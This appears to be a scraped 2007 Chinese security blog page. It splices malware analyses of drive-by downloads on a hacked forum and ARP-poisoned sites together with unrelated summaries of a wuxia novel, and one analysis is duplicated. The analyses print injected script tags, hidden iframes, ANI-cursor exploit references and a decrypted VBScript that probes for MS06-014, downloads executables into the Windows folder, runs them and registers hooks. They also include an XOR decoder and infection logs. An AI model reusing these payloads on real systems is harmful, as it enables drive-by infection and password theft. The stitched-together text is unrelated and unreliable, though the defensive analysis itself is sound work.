上回挂JPG图片的论坛改挂 d.exe 了

endurer 原创
2007-05-27 第1版

刚才去

某论坛上挂的东东，JPG图片 or 病毒Trojan.Win32.VB.azc？
http://endurer.bokee.com/6279320.html
http://blog.sina.com.cn/u/49926d91010008qj
http://blog.csdn.net/Purpleendurer/archive/2007/05/17/1613097.aspx
http://purple-endurer.blogspot.com/2007/05/jpg-or-trojanwin32vbazc.html

中的论坛转了转，发现挂的马变了，瑞星报告发现：Trojan.DL.VBS.Small.ei和Hack.SuspiciousAni。

网页首部植入的代码变为：
/---
＜script language＝javascript src＝hxxp://www**.8**8*vcd.com/htm*/china***/menu**.js＞＜/script＞
---/

menu**.js 包含代码：
/---
document.writeln("＜iframe src＝\"hxxp:\/\/www**.8**8*vcd.com\/htm*\/china***\/index*.htm\" width＝\"100\" height＝\"0\" frameborder＝\"0\"＞＜\/iframe＞");
---/

index*.htm 的title居然是：“人民公社”，包含两段恶意代码。
其一是VBScript脚本，没有加密，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 d.exe，保存为 c:\0.exe，然后通过 Shell.Application 对象 Q 的 ShellExecute 方法 来运行。

文件说明符 : D:\test\d.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-27 21:38:15
修改时间 : 2007-5-27 21:38:24
访问时间 : 2007-5-27 0:0:0
大小 : 18432 字节 18.0 KB
MD5 : b7e3a902048a9a5e12204083a935f64e

瑞星 19.24.61 没反应

Scanned file: d.exe

Statistics: Known viruses: 330518 Updated: 27-05-2007 File size (Kb): 18 Virus bodies: 0 Files: 1 Warnings: 0 Archives: 0 Suspicious: 0

其二是
/---
＜iframe src＝IE0day.htm width＝100 height＝0＞＜/iframe＞
---/

IE0day.htm 包含代码：
/---
＜DIV style＝"CURSOR: url('0day.jpg')"＞
---/

0day.jpg 利用 ANI 漏洞下载 d.exe

大侠狄龙子14回2概要 endurer评注 候文麟车卫师徒戏侮贼党 念淑华司徒良珠行前得警

大侠狄龙子14回2概要 endurer评注 候文麟车卫师徒戏侮贼党　念淑华司徒良珠行前得警

第十四回(2)
欢喜晤良朋　酒绿灯红愿言不尽
殷勤搀素手　山深路险蜜意无穷

　　沈煌得服本门特有轻身益气的灵药。冰如将乃母淑华江中遇险，现被黑衣女侠晏瑰救来山中之事说出，只不明言地方。

　　良珠先见文麟对淑华那样痴心，便想去看淑华到底多好。
　　良珠为来客准备宿处。司徒兄妹曾在山外救了许多人，将无处投奔的孤儿孤女带来山中，男的命其耕种，女的学习手工、做些杂事，准备年纪稍长后送往山外谋生，去留听便。这些男女孤儿谁也不舍离开。新近内有数人年已长大，男女双方发生情爱，不久便要成婚。司徒兄妹去往成都办了衣物被褥等家用必需之物备作为贺礼，故此一切现成。又往厨房安排。
　　回到房中，黑骷髅查牤说在冯家救文麟和蔡三姑时，见恶兽黄猩子暗算文麟。用太乙天罡掌由离地十余丈凌空打落，黄猩子避开正面，只打中右肩，被石笋猛撞一下，重伤残废，断去一臂，肩背额骨上皮毛也碎了一大片，还有几处零伤，未死。跟着遇见神乞车卫得有两个五台余孽赶到，代恶兽上了伤药，已能走动。
　　车卫因新收记名弟子袁和尚因受龙子之托他在黄桶桠守候文麟，一直暗随。袁和尚等到午后云消不见文麟走过，偷听由蔡家走出的三姑好友、两少年男女之言得知文麟已被贼党劫往冯村。
　　袁和尚赶到冯村，假装淘气，说他斫柴迷路，要人引他回去，将两个强横性暴的贼党引到无人无人之处，用昨日所学铁手箭将当头一贼的头打穿，空手擒住那贼。自称是神乞车卫新收弟子，拷问得知文麟已被中条七煞中人救走，还不肯信，打得那贼连声惨嗥，将附近路过一贼引来，两三个照面打倒来贼，先倒那贼已乘机逃走。他拷问来贼，所说与前贼相同，才知不差，正想赶往蔡家探看，发现敌党寻来，剥下死贼衣服和身边散银暗器，假装往前逃走，中途失落丢了一路，再赶回原处，藏在死尸前面大树之上。群贼一齐朝前追去。
　　袁和尚掩往侧面放了一把野火，在石上用箭留字，说他乃车三太爷弟子，特意来寻冯越晦气，不久便要扫灭全村，又将冯越迷恋蔡三姑、淫凶无耻、丢人的事写上好些，方始逃走。
　　随后来到的两个五台余孽，与车卫多年深仇，分头追将下来。
　　车卫一直掩在袁和尚身后，引逗戏侮这两个五台余孽和相随贼党，后发现内贼党厉害，暗令袁和尚急速回去。被袁和尚看出形迹，想公然现身与敌动手，好将车卫引出。车卫一时疏忽，竟被看见，急喊师父。气他不肯听话，假意发怒，骂了几句便往回走。和黑骷髅查牤相见后，想起袁和尚师徒平日树敌甚多，老和尚久出未归，他孤身回去难免遇上入山贼党，因袁和尚好友狄龙子和沈煌均在寒萼谷内，想去带袁和尚来此与小弟兄相聚，还可向诸老辈求教。去前说归途也许要去访他平生惟一忘年至交黑衣女侠晏瑰，托查牤转告主人不必等他师徒。
　　良珠亲身下厨以表诚心，想等到吃完抽空往青峰顶一行，听雷四先生说晏瑰方才已来，本想寻良珠一谈，简冰如有事令她往办，车卫十九扑空，袁和尚不敢动荤，请主人准备素菜。
　　良珠最爱干净，本担心车卫、袁和尚脏乱，正想推说自己和何紫枫途中相遇，约定今日往访，意欲抽空赶往，神乞车卫师徒忽从头到脚干干净净地到来。
　　良珠好胜心高，虽听车卫借话指点，似令她路上留神敌人两条臂膀，但听不惯倚老卖老的话，也不再问。怀方不大放心，因冰如方才背人暗示机宜，知道良珠往会淑华，不便说破，跟出正在暗中嘱咐，忽听冰如呼喊……

endurer评注

旧雨楼上的本回内容有错位……

黑骷髅视黑衣女侠晏瑰平生惟一忘年至交，两黑倒是挺班配的

袁和尚之师越来越令人好奇了……

［兵］三连明月铲：可叠成一圈，另有一个旧日麻布套背在身上

［兽］恶兽黄猩子：凶狡灵活……最是记仇，又不怕死

［人］袁和尚：平日胆大包身，刁钻疾恶，当时欺侮恶人，……淘气顽皮，嘴又能说，不怕责罚，对师虽极敬畏，性子一来照样闯祸。……说什么也不敢动荤

［人］黑衣女侠晏瑰：车卫平生惟一忘年至交，家住青峰顶，离此只十多里，多年未见，不知她昔年所发雄心大愿。事业如何、归途也许还要访她，就便同来。这位女侠最善烹调，酒菜极好。

［人］车卫：虽是化子打扮，所穿破旧衣服补洗也颇干净，只腰间一条草绳，加上那根纯钢打就、伪装叫花棒的方铁杖，看去像个化子，与平日传闻所说不同，连那头发，看去虽是乱蓬蓬茅草一般，上面也无一点尘土。

［人］良珠：最爱干净，房舍用具虽是朴素一类居多，并非华丽，经过自己布置，也是明窗净几，一尘不染，甚而花竹泉石均具匠心……人最聪明，喜欢自己动手，什么事都拿得起来，人又能干……好胜心高

［人］老和尚：见人追进，必要追问双方争斗原因，小和尚……虽然不免责罚，但对来人也决不肯轻易放过，定要喊住，追问来历姓名，所行所为，来到本山寻找什人，为了何事。这些贼党……当然不敢明说。老和尚偏是神目如电，问得更细，贼党的来踪去迹，是什门路，全都知道，瞒他不过。老和尚虽是温言细语，极有耐心，仿佛好朋友做了恶事被他晓得，尽朋友之义好言劝告，只不愿人隐瞒，非说出不肯放走，神情极为诚恳，不现分毫敌意，可是所说所问都是贼党心病隐恶之事；如其不耐盘问，恼羞成怒，想要动武，简直送死，打是打不过，自己的恶迹又实无法出口，又窘又怕，周身发烧，无可如何，终于被老和尚逼得说出真话才罢。老和尚听完不假，来人多大罪恶他也宽容，只诚诚恳恳劝告一阵，放他上路。有那天良没有丧尽的，非但当时自供罪恶表示愧悔，甚而痛哭流涕，由此改邪归正做了好人。据说老和尚问时，无论对方怎么愤恨发怒，只不动手，从无疾声厉色；便是动手，他也照例手都不还，可是来人只一近身必受内伤。有那只是闻名多年初次见到的，都说老和尚不知怎的另具一种极奇怪的力量，看去没有一点威风，词色那么和善从容，有条有理，轻易不说一句使人难堪的话，偏是不敢对他抗拒，便是怒极恨极，也不敢伸手为敌，始终说不出是什么原故。他这感化劝告之力实在不小，多恶的人一遇到他，便是江山易改本性难移，不久故态复萌，当时也有一点警觉。近两年来吃亏的越多，互相传说。有那未经老和尚感化，或是改了又犯旧恶的，均把他师徒恨到极点……听不惯这样疯疯癫癫、倚老卖老的话，

旧雨楼·还珠楼主《大侠狄龙子》全文

ARP病毒自动添加的网址利用ms07004EXP等传播Worm.Win32.Delf等

endurer 原创
2007-05-24 第1版

ARP病毒自动加入的网址为：
/---
＜scrīpt language＝javascrīpt src＝hxxp:／／google**.17***173**8.org／ad***.js＞＜／scrīpt＞
---/

ad***.js 包含代码：
/---
document.write（'＜iframe width＝0 height＝0 src＝"hxxp:／／google**.17***173**8.org／p*d***.htm"＞＜／iframe＞'）;
---/

p*d***.htm 首先引入文件jscode.js，其内容是使用eval（）执行自定义函数，从而产生自定义函数utf8to16（）、xxtea_decrypt（）、base64DecodeChars（），用于解密并输出变量t的值。

t 的值解密后为VBscrīpt脚本：
/---
＜scrīpt language＝VBscrīpt＞
on error resume next
Set downf ＝ document.createElement（"object"）
downf.setAttribute "classid", "clsid:BD9"＆"6C556－6"＆"5A3－11D"＆"0－983A－00C"＆"04FC2"＆"9E36"
str＝"Microsoft.XMLHTTP"
Set O ＝ downf.CreateObject（str,""）
if Not Err.Number ＝ 0 then
err.clear
'msgbox "没有0614漏洞,页面转到ms07004EXP!"
document.write（"＜iframe width＝""0"" height＝""0"" src＝""ms07017.htm""＞＜／iframe＞"）
else
'msgbox "存在0614漏洞,页面转到MS0614的EXP!"
document.write（"＜iframe width＝""0"" height＝""0"" src＝""06014.htm""＞＜／iframe＞"）
end if
＜／scrīpt＞
---/

ms07017.htm 与 p*d***.htm 相似，首先引入文件jscode.js，其内容是使用eval（）执行自定义函数，从而产生自定义函数utf8to16（）、xxtea_decrypt（）、base64DecodeChars（），用于解密并输出变量t的值。

解密后的t值为Javascrīpt脚本，功能是如果cookie变量“MTV”不存在，则创建，并输出sscape（）编码的代码：
/---
＜scrīpt src＝"ani.js"＞＜／scrīpt＞
---/

ani.js的内容为Javascrīpt脚本，包含代码：
/---
document.writeln（“＜DIV style＝\“CURSOR: url（hxxp:\／\／google**.17***173**8.org\／ani.jpg）\”＞＜\／DIV＞＜\／DIV＞＜\／BODY＞＜\／HTML＞”）;
---/

ani.jpg利用 ANI漏洞下载 update.exe

文件说明符 : D:\test\update.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-23 12:13:25
修改时间 : 2007-5-23 12:13:26
访问时间 : 2007-5-23 0:0:0
大小 : 36435 字节 35.595 KB
MD5 : e32966b40d3e655f1912b2cd6930b24b

Kaspersky 报为 Worm.Win32.Delf.cc，瑞星报为 Trojan.Mnless.lxp

06014.htm包含javascrīpt代码，功能是使用自定义函数utf8to16（）、xxtea_decrypt（）、base64DecodeChars（），用于解密并输出变量t的值。

t 的值解密后为VBscrīpt脚本，功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载rss.dll，保存为%windir%\WinHttp.dll，下载update.exe，保存为%windir%\KB726255.log，

创建Wscrīpt.Shell，在注册表HKLM\SOFTWARE\Classes\CLSID\{36CD708B－6077－4C02－9377－D73EAA495A0F}下创建键HTTP Execute Hooks和一些值。

其中部分代码需要使用自定义函数
/---
Function NC（x）
For i＝1 to Len（x） Step 2
NC＝NC ＆ Chr（CLng（"＆H" ＆ Mid（x,i,2）） Xor 23）
Next
End Function
---/

来解密。

文件说明符 : D:\test\rss.dll
属性 : A---
语言 : 中文（中国）
文件版本 : 6.00
说明 : Windows HTTPMon Dll
版权 : （C） Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 6.00
产品名称 : Microsoft（R） Windows（R） Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : WINHTTP
源文件名 : WINHTTP.DLL
创建时间 : 2007-5-24 13:57:51
修改时间 : 2007-5-24 13:57:54
访问时间 : 2007-5-24 0:0:0
大小 : 5120 字节 5.0 KB
MD5 : 5164bccd2a40d9ac9bf83453c171c720

大侠狄龙子14回1概要 endurer评注 贼盗云集 雷四约友除害 讨养角鹰 良珠水塘见怪

大侠狄龙子14回1概要 endurer评注 贼盗云集 雷四车卫约友除害 讨养角鹰 良珠后洞水塘见怪

第十四回(1)欢喜晤良朋　酒绿灯红愿言不尽　殷勤搀素手　山深路险蜜意无穷

　　司徒怀方说冯越不知司徒平夫妇的来历，几次拉拢无功，勾结山内外的恶贼大盗，关中九侠的多年仇敌，打算寻简冰如报仇，内一同党老贼乃昔年青城派纪登门下逐出来的弃徒，探出司徒家来历和隐居经过，及简冰如封剑修养隐居后山，过半年便封剑期满，还代冯越约了几个五台、华山两派的余孽，因往茅篷窥探不见一人，心疑简冰如避来此地，准备命一个与谷后赫连兄妹情份极深的女贼先来窥探。
　　雷四先生、神乞车卫闻讯赶来，说司徒平夫妇是自了汉，约了两位老友到司徒家相会，中条七友中的黑骷髅查牤就是车卫约来。
　　秦寒萼日前说是出山访友，司徒平也留信，说奉简冰如之命往大雪山一行，父母未回以前一切由兄妹作主。
　　大黄今日又将后山赫连兄妹养的大犀牛角折断，叫司徒良珠去寻简冰如探询请示，就便敷衍赫连兄妹两句。
　　良珠说起先以为赫连兄妹是好人，上月去讨一只刚生下来的角鹰回来驯养时，发现后洞水塘怪物咬死临水大树上所吊赤身小脚女子，山脚下堆着好些死人头骨，地上到处都有血迹，负责守洞的白猩子擅离职守，不愿让赫连兄妹知道，指引良珠和大黄安全离开。归途遇见简冰如，简冰如劝良珠忍耐一时。
　　良珠发现赫连女从未到简冰如茅篷前面去过，离寒萼谷里许定必告辞回去。
　　大黄性曾在青城派纪异门下两年，甚是灵慧，每次惹事都有原因。
　　珊儿说吼声在前，大黄后去，决不是大黄闯的祸。
　　怀方说略闻赫连兄妹来历，简冰如容他兄妹在此必有深意。
　　简冰如、雷四先生先后来到。沈煌喊文麟为老师，喊冰如为师父，喊怀方为大叔。
　　雷四与简冰如交往多年，日前偷听五台派余孽密谈，才知简冰如底细。
　　简冰如给旁取出药丸，用水化开，令沈煌服下后再静养一二日。

endurer评注

青城派纪登门下逐出来的弃徒不知是谁？五台、华山两派的余孽不知还有哪些？
赫连兄妹不知是何来历？养在后洞水塘中的不知是何怪物？
本回说大黄曾在青城派纪异门下两年，与前书所述不同。
沈煌与文麟、冰如、怀方的辈份真是一笔算不清的帐，《蜀山剑侠传》中周淳与其女周轻云，女神婴易静与两个侄儿易鼎、易震也是同门，不知相互是如何称呼了。

［人］司徒怀方：素来友爱

［人］司徒良珠：娇憨，少年英侠，向不受人欺侮

［人］女贼：天生怪物，长得和猴子差不多，身轻如燕，形迹飘忽，与谷后那两兄妹（赫连兄妹）情份极深

［禽］角鹰：初生角鹰只有鸽子大小，便有那样凶猛灵巧

［怪］怪物：周身蓝鳞、前生六脚、形如蜈蚣、后半似蛇非蛇

［人］赫连兄妹：蛮野丑恶

［兽］大黄：大黄性猛喜欢惹事，但它曾在青城派纪异师叔门下两年，甚是灵慧，我们和它处久，虽能闻声知意，到底不能全通兽语，有许多话它说不出来

旧雨楼·还珠楼主《大侠狄龙子》全文

ARP病毒自动添加的网址利用ms07004EXP和MS0614EXP传播Worm.Win32.Delf.cc等

endurer 原创
2007-05-24 第1版

ARP病毒自动加入的网址为：
/---
＜script language＝javascript src＝hxxp:／／google**.17***173**8.org／ad***.js＞＜／script＞
---/

ad***.js 包含代码：
/---
document.write（'＜iframe width＝0 height＝0 src＝"hxxp:／／google**.17***173**8.org／p*d***.htm"＞＜／iframe＞'）;
---/

p*d***.htm 首先引入文件jscode.js，其内容是使用eval（）执行自定义函数，从而产生自定义函数utf8to16（）、xxtea_decrypt（）、base64DecodeChars（），用于解密并输出变量t的值。

t 的值解密后为VBScript脚本：
/---
＜script language＝VBScript＞
on error resume next
Set downf ＝ document.createElement（"object"）
downf.setAttribute "classid", "clsid:BD9"＆"6C556－6"＆"5A3－11D"＆"0－983A－00C"＆"04FC2"＆"9E36"
str＝"Microsoft.XMLHTTP"
Set O ＝ downf.CreateObject（str,""）
if Not Err.Number ＝ 0 then
err.clear
'msgbox "没有0614漏洞,页面转到ms07004EXP!"
document.write（"＜iframe width＝""0"" height＝""0"" src＝""ms07017.htm""＞＜／iframe＞"）
else
'msgbox "存在0614漏洞,页面转到MS0614的EXP!"
document.write（"＜iframe width＝""0"" height＝""0"" src＝""06014.htm""＞＜／iframe＞"）
end if
＜／script＞
---/

ms07017.htm 与 p*d***.htm 相似，首先引入文件jscode.js，其内容是使用eval（）执行自定义函数，从而产生自定义函数utf8to16（）、xxtea_decrypt（）、base64DecodeChars（），用于解密并输出变量t的值。

解密后的t值为JavaScript脚本，功能是如果cookie变量“MTV”不存在，则创建，并输出sscape（）编码的代码：
/---
＜script src＝"ani.js"＞＜／script＞
---/

ani.js的内容为JavaScript脚本，包含代码：
/---
document.writeln（“＜DIV style＝\“CURSOR: url（hxxp:\／\／google**.17***173**8.org\／ani.jpg）\”＞＜\／DIV＞＜\／DIV＞＜\／BODY＞＜\／HTML＞”）;
---/

ani.jpg利用 ANI漏洞下载 update.exe

文件说明符 : D:\test\update.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-23 12:13:25
修改时间 : 2007-5-23 12:13:26
访问时间 : 2007-5-23 0:0:0
大小 : 36435 字节 35.595 KB
MD5 : e32966b40d3e655f1912b2cd6930b24b

Kaspersky 报为 Worm.Win32.Delf.cc，瑞星报为 Trojan.Mnless.lxp

06014.htm包含javascript代码，功能是使用自定义函数utf8to16（）、xxtea_decrypt（）、base64DecodeChars（），用于解密并输出变量t的值。

t 的值解密后为VBScript脚本，功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载rss.dll，保存为%windir%\WinHttp.dll，下载update.exe，保存为%windir%\KB726255.log，

创建WScript.Shell，在注册表HKLM\SOFTWARE\Classes\CLSID\{36CD708B－6077－4C02－9377－D73EAA495A0F}下创建键HTTP Execute Hooks和一些值。

其中部分代码需要使用自定义函数
/---
Function NC（x）
For i＝1 to Len（x） Step 2
NC＝NC ＆ Chr（CLng（"＆H" ＆ Mid（x,i,2）） Xor 23）
Next
End Function
---/

来解密。

文件说明符 : D:\test\rss.dll
属性 : A---
语言 : 中文（中国）
文件版本 : 6.00
说明 : Windows HTTPMon Dll
版权 : （C） Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 6.00
产品名称 : Microsoft（R） Windows（R） Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : WINHTTP
源文件名 : WINHTTP.DLL
创建时间 : 2007-5-24 13:57:51
修改时间 : 2007-5-24 13:57:54
访问时间 : 2007-5-24 0:0:0
大小 : 5120 字节 5.0 KB
MD5 : 5164bccd2a40d9ac9bf83453c171c720

检查中ARP病毒的电脑，一堆网游盗号木马Trojan.PSW.RocOnline变种等

endurer 原创
2007-05-22 第1版

今天终于有机会检查那台疑是中了ARP病毒的电脑

ARP病毒“吃里巴外”？
http://endurer.bokee.com/6277614.html
http://blog.csdn.net/Purpleendurer/archive/2007/05/16/1611620.aspx
http://blog.sina.com.cn/u/49926d91010008q6

把网线断开，用U盘拷来 pe_xscan.exe、HijackThis.exe，bat_do.exe、FreeDLL.exe、FileInfo.exe、Dr.Web CureIt! 等工具备用。

先用 pe_xscan 扫描 log并分析，发现可疑项：

pe_xscan 07-03-17 by Purple Endurer
2007-5-22 12:15:52
Windows XP Service Pack 2(5.1.2600)
管理员用户组

[System Process] * 0
G:\tool\3.exe 2007-5-22 10:53:24
C:\Program Files\QQ2006\q.dll 2007-5-17 7:23:50
C:\WINDOWS\system32\1.1 1601-1-2 7:8:43
C:\WINDOWS\system32\1mb0pe.l6v 2004-8-17 12:0:0 Microsoft(R) Windows(R) Operating System 5.1.2600.2180 Advanced Windows 32 Base API (C) Microsoft Corporation. All rights reserved. 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? advapi32.dll advapi32.dll
C:\WINDOWS\system32\hreax.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\wtrmm.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\wgptl.dll 2004-8-17 12:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.dll 2007-5-22 8:56:20
C:\WINDOWS\system32\cmdbs.dll 2007-5-22 8:56:20
C:\WINDOWS\system32\mppds.dll 2007-5-22 8:56:20
C:\WINDOWS\system32\winform.dll 2007-5-22 8:56:18
C:\WINDOWS\system32\javavmj.dll 2007-5-22 8:56:18

C:\WINDOWS\EXPLORER.EXE * 1524
C:\WINDOWS\system32\pdkpri.dll 2004-8-4 10:14:24
C:\WINDOWS\system32\wscsv.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\wgptl.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\wtrmm.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\hreax.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\TALSZG.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\javavmj.dll 2007-5-22 8:56:18
C:\WINDOWS\system32\winform.dll 2007-5-22 8:56:18
C:\WINDOWS\system32\mppds.dll 2007-5-22 8:56:20
C:\WINDOWS\system32\cmdbs.dll 2007-5-22 8:56:20
C:\WINDOWS\system32\1.1 1601-1-2 7:8:43
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.dll 2007-5-22 8:56:20
c:\windows\system32\bd.dll
C:\WINDOWS\system32\msacn.dll 2004-8-17 12:0:0
C:\Program Files\QQ2006\q.dll 2007-5-17 7:23:50
C:\Program Files\Common Files\Real\Update_OB\realsched.exe * 644
C:\WINDOWS\system32\hreax.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\wtrmm.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\wgptl.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\1.1 1601-1-2 7:8:43
C:\Program Files\QQ2006\q.dll 2007-5-17 7:23:50
C:\WINDOWS\system32\RunDll32.exe * 1180
C:\WINDOWS\system32\1.1 1601-1-2 7:8:43
C:\WINDOWS\system32\hreax.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\wtrmm.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\wgptl.dll 2004-8-17 12:0:0
C:\Program Files\QQ2006\q.dll 2007-5-17 7:23:50
C:\WINDOWS\system32\ctfmon.exe * 2080
C:\WINDOWS\system32\1.1 1601-1-2 7:8:43
C:\WINDOWS\system32\hreax.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\wtrmm.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\wgptl.dll 2004-8-17 12:0:0
C:\Program Files\QQ2006\q.dll 2007-5-17 7:23:50
C:\WINDOWS\system32\scvhost.exe * 2240
C:\WINDOWS\system32\npp\ndisnpp.dll 2004-8-17 12:0:0 Microsoft? Windows? Operating System 5.1.2600.2180 Network Monitor NDIS Network Packet Provider ? Microsoft Corporation. All rights reserved. 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? NDISNPP.DLL NDISNPP.DLL
C:\WINDOWS\system32\1.1 1601-1-2 7:8:43
C:\WINDOWS\system32\CONIME.EXE * 2356
C:\WINDOWS\system32\1.1 1601-1-2 7:8:43
C:\WINDOWS\system32\hreax.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\wtrmm.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\wgptl.dll 2004-8-17 12:0:0
C:\Program Files\QQ2006\q.dll 2007-5-17 7:23:50
C:\WINDOWS\system32\RunDll32.exe * 3880
C:\WINDOWS\system32\TALSZG.dll 2004-8-17 12:0:0
C:\Program Files\QQ2006\q.dll 2007-5-17 7:23:50
C:\WINDOWS\system32\1.1 1601-1-2 7:8:43
C:\WINDOWS\system32\hreax.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\wtrmm.dll 2004-8-17 12:0:0
C:\WINDOWS\system32\wgptl.dll 2004-8-17 12:0:0

O1 - （hosts文件的内容，太长，这里略了）

O4 - HKLM\..\Run: [javavmj] C:\WINDOWS\javavmj.exe
O4 - HKLM\..\Run: [winform] C:\WINDOWS\winform.exe
O4 - HKLM\..\Run: [cmdbs] C:\WINDOWS\cmdbs.exe
O4 - HKLM\..\Run: [mppds] C:\WINDOWS\mppds.exe
O4 - HKLM\..\Run: [upxdnd] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.exe
O4 - HKLM\..\Run: [A] C:\WINDOWS\system32\rundll32.exe 1.1 s
O4 - HKLM\..\Run: [KVP] C:\WINDOWS\system32\drivers\svchost.exe

I:\autorun.inf
/，--
[AutoRun]
open=000.exe
，--/

O23 - 服务: MSDebugsvc (Win32 Debug Service) - C:\WINDOWS\system32rundll32.exe msdebug.dll,input(自动)

O23 - 服务: WinDHCPsvc (Windows DHCP Service) - C:\WINDOWS\system32rundll32.exe windhcp.ocx,input(自动)

O23 - 服务: WindowsDown (Windows Ins) - C:\WINDOWS\system32\servet.exe 2007-5-15 18:34:52(自动)

O23 - 服务: WindowsDown000 (Windows) - C:\WINDOWS\system32\000.exe 2007-5-16 10:13:30(自动)

O23 - 服务: WinXPDHCPsvc (WinXP DHCP Service) - C:\WINDOWS\system32rundll32.exe xpdhcp.dll,input(自动)

O24 - [] - {42A612A4-4334-4424-4234-42261A31A236} = C:\WINDOWS\system32\pdkpri.dll
O24 - [Microsoft Data Tools Query Designe] - {1496D5ED-7A09-46D0-8C92-B8E71A4304DF} = C:\WINDOWS\system32\msacn.dll
O24 - [] - {B05AF49E-B05A-38D2-9E38-F49E38D27C16} = C:\WINDOWS\system32\TALSZG.dll

O25 - {AA312103-F04D-11cf-64CD-11EF5011CF20} = C:\WINDOWS\system32\nwizqjsj.exe

其中I:为U盘盘符，居然一接入电脑就中标了……

检查 c:\windows\system32，发现一大堆可疑文件。

C:\>dir c:\windows\system32 /od /a
驱动器 C 中的卷是 WINXP
卷的序列号是 2A1D-0905

c:\windows\system32 的目录

……（略）
2007-05-15 07:26 18,432 AVG.exe
2007-05-15 07:26 18,432 CFTMON.exe
2007-05-15 07:26 19,456 INETINF.exe
2007-05-15 07:27 21,504 LSASSS.exe
2007-05-15 07:27 17,408 SVCHOTS.exe
2007-05-15 07:27 7,020 ALP.exe
2007-05-15 07:27 12,288 SOUND.exe
2007-05-15 07:27 17,920 DATSC.exe
2007-05-15 07:27 25,357 MSTCS.exe
2007-05-15 07:27 13,312 ADOBESVC.exe
2007-05-15 18:34 16,619 servet.exe
2007-05-16 10:13 16,652 000.exe
2007-05-16 10:14 142 kupini.dll
2007-05-16 10:14 21,745 WanPacket.dll
2007-05-16 10:14 26,956 Packet.dll
2007-05-16 10:14 82,512 wpcap.dll
2007-05-16 10:37 253,647 SMSSS.exe
2007-05-17 07:23 42,929 1.1
2007-05-18 07:46 8,192 nwizqjsj.exe
2007-05-18 07:46 8,704 nwizqjsj.dll
2007-05-18 07:46 19,456 msdebug.dll
2007-05-18 0€D7:46 17,739 until.ttc
2007-05-18 07:46 196,608 QQ.exe
2007-05-18 07:46 11,776 DOWN.exe
2007-05-18 15:26 22,528 MY.exe
2007-05-18 15:26 18,944 RemoteDbg.dll
2007-05-21 08:50 2,206 wpa.dbl
2007-05-21 08:51 20,480 windhcp.ocx
2007-05-21 08:51 18,944 xpdhcp.dll
2007-05-22 08:56 12,288 winform.dll
2007-05-22 08:56 6,656 javavmj.dll
2007-05-22 08:56 12,288 cmdbs.dll
2007-05-22 08:56 14,848 mppds.dll
……（略）

用FileInfo 和 bat_do 提取部分文件信息并打包、删除文件。

文件说明符 : C:\WINDOWS\winform.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:13:42
修改时间 : 2007-5-21 8:51:14
访问时间 : 2007-5-22 0:0:0
大小 : 19456 字节 19.0 KB
MD5 : 7928aac5390bbc9eaeb6f31c1f52707f

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.te，瑞星 报为Trojan.PSW.OnlineGames.blk

文件说明符 : C:\WINDOWS\system32\winform.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:13:42
修改时间 : 2007-5-22 8:56:18
访问时间 : 2007-5-22 0:0:0
大小 : 12288 字节 12.0 KB
MD5 : 2c984634f05b719f8613f6333ce41eea

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.te，瑞星 报为Trojan.PSW.Onli€DneGames.bln

文件说明符 : C:\WINDOWS\cmdbs.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:13:49
修改时间 : 2007-5-21 8:51:36
访问时间 : 2007-5-22 0:0:0
大小 : 19456 字节 19.0 KB
MD5 : 5f0bdc2268abc3cad0df489222c00595

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.es，-瑞星 报为Trojan.PSW.OnlineGames.awo

文件说明符 : C:\WINDOWS\system32\cmdbs.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:13:49
修改时间 : 2007-5-22 8:56:20
访问时间 : 2007-5-22 0:0:0
大小 : 12288 字节 12.0 KB
MD5 : 67c3c6dc9a297ac4263b4a70d042a2c3

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.es，瑞星 报为Trojan.PSW.OnlineGames.awo

文件说明符 : C:\WINDOWS\mppds.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:14:5
修改时间 : 2007-5-17 7:23:36
访问时间 : 2007-5-22 0:0:0
大小 : 21504 字节 21.0 KB
MD5 : 8634660dddbdec6e0ac307e97fdfecf5

Kaspersky 报为Trojan-PSW.Win32.OnLineGames.qy，瑞星 报为Trojan.PSW.OnlineGames.bju

文件说明符 : C:\WINDOWS\system32\mppds.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:14:6
修改时间 : 2007-5-22 8:56:20
访问时间 : 2007-5-22 0:0:0
